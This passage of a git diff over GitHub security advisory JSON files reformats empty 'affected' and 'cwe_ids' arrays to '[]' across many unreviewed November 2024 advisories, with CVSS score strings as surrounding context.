b/advisories/unreviewed/2024/11/GHSA-m7p9-qq2j-2h4p/GHSA-m7p9-qq2j-2h4p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-m84v-65mj-hw78/GHSA-m84v-65mj-hw78.json b/advisories/unreviewed/2024/11/GHSA-m84v-65mj-hw78/GHSA-m84v-65mj-hw78.json index 79e35032edb..30c2279d0f5 100644 --- a/advisories/unreviewed/2024/11/GHSA-m84v-65mj-hw78/GHSA-m84v-65mj-hw78.json +++ b/advisories/unreviewed/2024/11/GHSA-m84v-65mj-hw78/GHSA-m84v-65mj-hw78.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-m87c-pc83-wrfv/GHSA-m87c-pc83-wrfv.json b/advisories/unreviewed/2024/11/GHSA-m87c-pc83-wrfv/GHSA-m87c-pc83-wrfv.json index 242e3a300ed..afe63496a87 100644 --- a/advisories/unreviewed/2024/11/GHSA-m87c-pc83-wrfv/GHSA-m87c-pc83-wrfv.json +++ b/advisories/unreviewed/2024/11/GHSA-m87c-pc83-wrfv/GHSA-m87c-pc83-wrfv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mh62-5j9h-2c77/GHSA-mh62-5j9h-2c77.json b/advisories/unreviewed/2024/11/GHSA-mh62-5j9h-2c77/GHSA-mh62-5j9h-2c77.json index 8aed96b36df..77b6c4738ee 100644 --- a/advisories/unreviewed/2024/11/GHSA-mh62-5j9h-2c77/GHSA-mh62-5j9h-2c77.json +++ b/advisories/unreviewed/2024/11/GHSA-mh62-5j9h-2c77/GHSA-mh62-5j9h-2c77.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mmv8-59h2-5hqj/GHSA-mmv8-59h2-5hqj.json b/advisories/unreviewed/2024/11/GHSA-mmv8-59h2-5hqj/GHSA-mmv8-59h2-5hqj.json index da26cbb5c76..7afffcf61f7 100644 --- a/advisories/unreviewed/2024/11/GHSA-mmv8-59h2-5hqj/GHSA-mmv8-59h2-5hqj.json +++ b/advisories/unreviewed/2024/11/GHSA-mmv8-59h2-5hqj/GHSA-mmv8-59h2-5hqj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mmxq-gq3m-xgpf/GHSA-mmxq-gq3m-xgpf.json b/advisories/unreviewed/2024/11/GHSA-mmxq-gq3m-xgpf/GHSA-mmxq-gq3m-xgpf.json index f8b8228caa9..1b763d053c2 100644 --- a/advisories/unreviewed/2024/11/GHSA-mmxq-gq3m-xgpf/GHSA-mmxq-gq3m-xgpf.json +++ b/advisories/unreviewed/2024/11/GHSA-mmxq-gq3m-xgpf/GHSA-mmxq-gq3m-xgpf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-mp6w-qw2g-78wx/GHSA-mp6w-qw2g-78wx.json b/advisories/unreviewed/2024/11/GHSA-mp6w-qw2g-78wx/GHSA-mp6w-qw2g-78wx.json index d72e417bea3..9b5a4bb4c42 100644 --- a/advisories/unreviewed/2024/11/GHSA-mp6w-qw2g-78wx/GHSA-mp6w-qw2g-78wx.json +++ b/advisories/unreviewed/2024/11/GHSA-mp6w-qw2g-78wx/GHSA-mp6w-qw2g-78wx.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mpxg-m884-58ff/GHSA-mpxg-m884-58ff.json b/advisories/unreviewed/2024/11/GHSA-mpxg-m884-58ff/GHSA-mpxg-m884-58ff.json index 5952e999739..65a61c1d979 100644 --- a/advisories/unreviewed/2024/11/GHSA-mpxg-m884-58ff/GHSA-mpxg-m884-58ff.json +++ b/advisories/unreviewed/2024/11/GHSA-mpxg-m884-58ff/GHSA-mpxg-m884-58ff.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-mqp6-pw26-w368/GHSA-mqp6-pw26-w368.json b/advisories/unreviewed/2024/11/GHSA-mqp6-pw26-w368/GHSA-mqp6-pw26-w368.json index 7952b0dbb8c..006b2b0034c 100644 --- a/advisories/unreviewed/2024/11/GHSA-mqp6-pw26-w368/GHSA-mqp6-pw26-w368.json +++ b/advisories/unreviewed/2024/11/GHSA-mqp6-pw26-w368/GHSA-mqp6-pw26-w368.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mv89-4hh2-m625/GHSA-mv89-4hh2-m625.json b/advisories/unreviewed/2024/11/GHSA-mv89-4hh2-m625/GHSA-mv89-4hh2-m625.json index f7cb470a2fb..4521585a9ba 100644 --- a/advisories/unreviewed/2024/11/GHSA-mv89-4hh2-m625/GHSA-mv89-4hh2-m625.json +++ b/advisories/unreviewed/2024/11/GHSA-mv89-4hh2-m625/GHSA-mv89-4hh2-m625.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mvj5-x7rr-vvqv/GHSA-mvj5-x7rr-vvqv.json b/advisories/unreviewed/2024/11/GHSA-mvj5-x7rr-vvqv/GHSA-mvj5-x7rr-vvqv.json index 3b0564d73a9..2d8fc538bb5 100644 --- a/advisories/unreviewed/2024/11/GHSA-mvj5-x7rr-vvqv/GHSA-mvj5-x7rr-vvqv.json +++ b/advisories/unreviewed/2024/11/GHSA-mvj5-x7rr-vvqv/GHSA-mvj5-x7rr-vvqv.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mvm7-2x9x-6r3g/GHSA-mvm7-2x9x-6r3g.json b/advisories/unreviewed/2024/11/GHSA-mvm7-2x9x-6r3g/GHSA-mvm7-2x9x-6r3g.json index 52dbfbdb0f3..fce15309b35 100644 --- a/advisories/unreviewed/2024/11/GHSA-mvm7-2x9x-6r3g/GHSA-mvm7-2x9x-6r3g.json +++ b/advisories/unreviewed/2024/11/GHSA-mvm7-2x9x-6r3g/GHSA-mvm7-2x9x-6r3g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-mx28-rfqr-gwv8/GHSA-mx28-rfqr-gwv8.json b/advisories/unreviewed/2024/11/GHSA-mx28-rfqr-gwv8/GHSA-mx28-rfqr-gwv8.json index 74d8d1b6757..aa614d925ea 100644 --- a/advisories/unreviewed/2024/11/GHSA-mx28-rfqr-gwv8/GHSA-mx28-rfqr-gwv8.json +++ b/advisories/unreviewed/2024/11/GHSA-mx28-rfqr-gwv8/GHSA-mx28-rfqr-gwv8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -51,9 +49,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-p299-525g-4h76/GHSA-p299-525g-4h76.json b/advisories/unreviewed/2024/11/GHSA-p299-525g-4h76/GHSA-p299-525g-4h76.json index 53a66fed6cb..6566e41731b 100644 --- a/advisories/unreviewed/2024/11/GHSA-p299-525g-4h76/GHSA-p299-525g-4h76.json +++ b/advisories/unreviewed/2024/11/GHSA-p299-525g-4h76/GHSA-p299-525g-4h76.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-p2fh-w83x-vrm3/GHSA-p2fh-w83x-vrm3.json b/advisories/unreviewed/2024/11/GHSA-p2fh-w83x-vrm3/GHSA-p2fh-w83x-vrm3.json index 2aef72f4147..3378d0e98d9 100644 --- a/advisories/unreviewed/2024/11/GHSA-p2fh-w83x-vrm3/GHSA-p2fh-w83x-vrm3.json +++ b/advisories/unreviewed/2024/11/GHSA-p2fh-w83x-vrm3/GHSA-p2fh-w83x-vrm3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-p3r5-57j4-gq4x/GHSA-p3r5-57j4-gq4x.json b/advisories/unreviewed/2024/11/GHSA-p3r5-57j4-gq4x/GHSA-p3r5-57j4-gq4x.json index eb733b772d6..ad9bd2c9635 100644 --- a/advisories/unreviewed/2024/11/GHSA-p3r5-57j4-gq4x/GHSA-p3r5-57j4-gq4x.json +++ b/advisories/unreviewed/2024/11/GHSA-p3r5-57j4-gq4x/GHSA-p3r5-57j4-gq4x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-pfv7-6gr3-pf99/GHSA-pfv7-6gr3-pf99.json b/advisories/unreviewed/2024/11/GHSA-pfv7-6gr3-pf99/GHSA-pfv7-6gr3-pf99.json index 238ff86d3ab..d1c63530578 100644 --- a/advisories/unreviewed/2024/11/GHSA-pfv7-6gr3-pf99/GHSA-pfv7-6gr3-pf99.json +++ b/advisories/unreviewed/2024/11/GHSA-pfv7-6gr3-pf99/GHSA-pfv7-6gr3-pf99.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-pjpw-9hx5-m28p/GHSA-pjpw-9hx5-m28p.json b/advisories/unreviewed/2024/11/GHSA-pjpw-9hx5-m28p/GHSA-pjpw-9hx5-m28p.json index cf7cadff5c3..d658d6ad957 100644 --- a/advisories/unreviewed/2024/11/GHSA-pjpw-9hx5-m28p/GHSA-pjpw-9hx5-m28p.json +++ b/advisories/unreviewed/2024/11/GHSA-pjpw-9hx5-m28p/GHSA-pjpw-9hx5-m28p.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-pq9m-6wc9-h4hj/GHSA-pq9m-6wc9-h4hj.json b/advisories/unreviewed/2024/11/GHSA-pq9m-6wc9-h4hj/GHSA-pq9m-6wc9-h4hj.json index a38d4234055..9e3211b0770 100644 --- a/advisories/unreviewed/2024/11/GHSA-pq9m-6wc9-h4hj/GHSA-pq9m-6wc9-h4hj.json +++ b/advisories/unreviewed/2024/11/GHSA-pq9m-6wc9-h4hj/GHSA-pq9m-6wc9-h4hj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-pw8m-x6vh-jjg2/GHSA-pw8m-x6vh-jjg2.json b/advisories/unreviewed/2024/11/GHSA-pw8m-x6vh-jjg2/GHSA-pw8m-x6vh-jjg2.json index 688af760345..f04baaac2b1 100644 --- a/advisories/unreviewed/2024/11/GHSA-pw8m-x6vh-jjg2/GHSA-pw8m-x6vh-jjg2.json +++ b/advisories/unreviewed/2024/11/GHSA-pw8m-x6vh-jjg2/GHSA-pw8m-x6vh-jjg2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-pwxh-q8rp-9v3p/GHSA-pwxh-q8rp-9v3p.json b/advisories/unreviewed/2024/11/GHSA-pwxh-q8rp-9v3p/GHSA-pwxh-q8rp-9v3p.json index 36b63bdf23b..78ae012839e 100644 --- a/advisories/unreviewed/2024/11/GHSA-pwxh-q8rp-9v3p/GHSA-pwxh-q8rp-9v3p.json +++ b/advisories/unreviewed/2024/11/GHSA-pwxh-q8rp-9v3p/GHSA-pwxh-q8rp-9v3p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-q46c-j82q-5ggh/GHSA-q46c-j82q-5ggh.json b/advisories/unreviewed/2024/11/GHSA-q46c-j82q-5ggh/GHSA-q46c-j82q-5ggh.json index bec2a6eb2e0..b48e807f734 100644 --- a/advisories/unreviewed/2024/11/GHSA-q46c-j82q-5ggh/GHSA-q46c-j82q-5ggh.json +++ b/advisories/unreviewed/2024/11/GHSA-q46c-j82q-5ggh/GHSA-q46c-j82q-5ggh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-q46h-crrj-ggjm/GHSA-q46h-crrj-ggjm.json b/advisories/unreviewed/2024/11/GHSA-q46h-crrj-ggjm/GHSA-q46h-crrj-ggjm.json index f7cf657adf9..fa4ddf3d6c4 100644 --- a/advisories/unreviewed/2024/11/GHSA-q46h-crrj-ggjm/GHSA-q46h-crrj-ggjm.json +++ b/advisories/unreviewed/2024/11/GHSA-q46h-crrj-ggjm/GHSA-q46h-crrj-ggjm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-q7j7-7r72-9h66/GHSA-q7j7-7r72-9h66.json b/advisories/unreviewed/2024/11/GHSA-q7j7-7r72-9h66/GHSA-q7j7-7r72-9h66.json index d97574d5c10..41e08935523 100644 --- a/advisories/unreviewed/2024/11/GHSA-q7j7-7r72-9h66/GHSA-q7j7-7r72-9h66.json +++ b/advisories/unreviewed/2024/11/GHSA-q7j7-7r72-9h66/GHSA-q7j7-7r72-9h66.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:L/VI:L/VA:H/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-q9h5-v87h-3hhr/GHSA-q9h5-v87h-3hhr.json b/advisories/unreviewed/2024/11/GHSA-q9h5-v87h-3hhr/GHSA-q9h5-v87h-3hhr.json index efa21f794f8..c054f5358c8 100644 --- a/advisories/unreviewed/2024/11/GHSA-q9h5-v87h-3hhr/GHSA-q9h5-v87h-3hhr.json +++ b/advisories/unreviewed/2024/11/GHSA-q9h5-v87h-3hhr/GHSA-q9h5-v87h-3hhr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-q9qw-6hf7-48wg/GHSA-q9qw-6hf7-48wg.json b/advisories/unreviewed/2024/11/GHSA-q9qw-6hf7-48wg/GHSA-q9qw-6hf7-48wg.json index a0181e5d1d2..97c1f976138 100644 --- a/advisories/unreviewed/2024/11/GHSA-q9qw-6hf7-48wg/GHSA-q9qw-6hf7-48wg.json +++ b/advisories/unreviewed/2024/11/GHSA-q9qw-6hf7-48wg/GHSA-q9qw-6hf7-48wg.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qc3r-qr6p-cwr5/GHSA-qc3r-qr6p-cwr5.json b/advisories/unreviewed/2024/11/GHSA-qc3r-qr6p-cwr5/GHSA-qc3r-qr6p-cwr5.json index 3b27ecbd17e..4fce455442a 100644 --- a/advisories/unreviewed/2024/11/GHSA-qc3r-qr6p-cwr5/GHSA-qc3r-qr6p-cwr5.json +++ b/advisories/unreviewed/2024/11/GHSA-qc3r-qr6p-cwr5/GHSA-qc3r-qr6p-cwr5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qj97-9rrv-6887/GHSA-qj97-9rrv-6887.json b/advisories/unreviewed/2024/11/GHSA-qj97-9rrv-6887/GHSA-qj97-9rrv-6887.json index eb2c147ad71..d11604c2bee 100644 --- a/advisories/unreviewed/2024/11/GHSA-qj97-9rrv-6887/GHSA-qj97-9rrv-6887.json +++ b/advisories/unreviewed/2024/11/GHSA-qj97-9rrv-6887/GHSA-qj97-9rrv-6887.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qjjg-xwf5-ccw7/GHSA-qjjg-xwf5-ccw7.json b/advisories/unreviewed/2024/11/GHSA-qjjg-xwf5-ccw7/GHSA-qjjg-xwf5-ccw7.json index 15533e4db09..2ce50851751 100644 --- a/advisories/unreviewed/2024/11/GHSA-qjjg-xwf5-ccw7/GHSA-qjjg-xwf5-ccw7.json +++ b/advisories/unreviewed/2024/11/GHSA-qjjg-xwf5-ccw7/GHSA-qjjg-xwf5-ccw7.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qm24-fmqw-f5v5/GHSA-qm24-fmqw-f5v5.json b/advisories/unreviewed/2024/11/GHSA-qm24-fmqw-f5v5/GHSA-qm24-fmqw-f5v5.json index 62f956149f8..0e189821d90 100644 --- a/advisories/unreviewed/2024/11/GHSA-qm24-fmqw-f5v5/GHSA-qm24-fmqw-f5v5.json +++ b/advisories/unreviewed/2024/11/GHSA-qm24-fmqw-f5v5/GHSA-qm24-fmqw-f5v5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qppc-w6vv-vxmr/GHSA-qppc-w6vv-vxmr.json b/advisories/unreviewed/2024/11/GHSA-qppc-w6vv-vxmr/GHSA-qppc-w6vv-vxmr.json index 0f0759c886b..b7dbec5f0d4 100644 --- a/advisories/unreviewed/2024/11/GHSA-qppc-w6vv-vxmr/GHSA-qppc-w6vv-vxmr.json +++ b/advisories/unreviewed/2024/11/GHSA-qppc-w6vv-vxmr/GHSA-qppc-w6vv-vxmr.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qqm7-v4mx-rj2v/GHSA-qqm7-v4mx-rj2v.json b/advisories/unreviewed/2024/11/GHSA-qqm7-v4mx-rj2v/GHSA-qqm7-v4mx-rj2v.json index ac56f73f2bb..ab2ae9b5813 100644 --- a/advisories/unreviewed/2024/11/GHSA-qqm7-v4mx-rj2v/GHSA-qqm7-v4mx-rj2v.json +++ b/advisories/unreviewed/2024/11/GHSA-qqm7-v4mx-rj2v/GHSA-qqm7-v4mx-rj2v.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-qxhf-m3mr-36x5/GHSA-qxhf-m3mr-36x5.json b/advisories/unreviewed/2024/11/GHSA-qxhf-m3mr-36x5/GHSA-qxhf-m3mr-36x5.json index e7605bdae8b..45414b956af 100644 --- a/advisories/unreviewed/2024/11/GHSA-qxhf-m3mr-36x5/GHSA-qxhf-m3mr-36x5.json +++ b/advisories/unreviewed/2024/11/GHSA-qxhf-m3mr-36x5/GHSA-qxhf-m3mr-36x5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-r4x3-pjwq-wcwm/GHSA-r4x3-pjwq-wcwm.json b/advisories/unreviewed/2024/11/GHSA-r4x3-pjwq-wcwm/GHSA-r4x3-pjwq-wcwm.json index 8988e0067a8..55d75f7b4d0 100644 --- a/advisories/unreviewed/2024/11/GHSA-r4x3-pjwq-wcwm/GHSA-r4x3-pjwq-wcwm.json +++ b/advisories/unreviewed/2024/11/GHSA-r4x3-pjwq-wcwm/GHSA-r4x3-pjwq-wcwm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-r5p5-4qgc-2xcp/GHSA-r5p5-4qgc-2xcp.json b/advisories/unreviewed/2024/11/GHSA-r5p5-4qgc-2xcp/GHSA-r5p5-4qgc-2xcp.json index 52135eb552f..83f40d8edad 100644 --- a/advisories/unreviewed/2024/11/GHSA-r5p5-4qgc-2xcp/GHSA-r5p5-4qgc-2xcp.json +++ b/advisories/unreviewed/2024/11/GHSA-r5p5-4qgc-2xcp/GHSA-r5p5-4qgc-2xcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-r74p-fwjf-cpr8/GHSA-r74p-fwjf-cpr8.json b/advisories/unreviewed/2024/11/GHSA-r74p-fwjf-cpr8/GHSA-r74p-fwjf-cpr8.json index 472fc7ebdd0..b069981b68d 100644 --- a/advisories/unreviewed/2024/11/GHSA-r74p-fwjf-cpr8/GHSA-r74p-fwjf-cpr8.json +++ b/advisories/unreviewed/2024/11/GHSA-r74p-fwjf-cpr8/GHSA-r74p-fwjf-cpr8.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-r962-v37q-hrg6/GHSA-r962-v37q-hrg6.json b/advisories/unreviewed/2024/11/GHSA-r962-v37q-hrg6/GHSA-r962-v37q-hrg6.json index fcca4ca0f82..65f7f249392 100644 --- a/advisories/unreviewed/2024/11/GHSA-r962-v37q-hrg6/GHSA-r962-v37q-hrg6.json +++ b/advisories/unreviewed/2024/11/GHSA-r962-v37q-hrg6/GHSA-r962-v37q-hrg6.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 